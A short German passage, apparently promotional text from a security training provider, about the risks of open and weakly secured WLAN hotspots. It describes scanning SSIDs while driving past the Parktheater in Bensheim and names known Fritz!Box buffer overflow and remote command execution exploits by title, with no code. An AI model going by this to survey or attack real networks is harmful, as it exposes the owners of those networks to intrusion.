In unseren Schulungen haben wir gezeigt, wie man einen WiFi Client angreift. Natürlich auch wie man sich am besten vor einem solchen Angriff schützt.

Die Gefahr, welche von offenen und schlecht gesicherten WLAN Hotspots ausgeht, und die Möglichkeiten, welche sich für Hacker ergeben lassen im ersten Moment an der Einsatzfähigkeit zweifeln. Ein einfacher Scan während einer Vorbeifahrt am Bensheimer Parktheater zeigt bereits etliche SSIDs inklusive den entsprechenden Sicherheitsvorkehrungen. Schon die Erkenntnis, dass Fritzboxen kleiner als die 7390 zum Einsatz kommen, zeigt die vernachlässigten Sicherheitsmaßnahmen (AVM FRITZ!Box < 6.30 - Buffer Overflow, Fritz!Box - Remote Command Execution Exploit).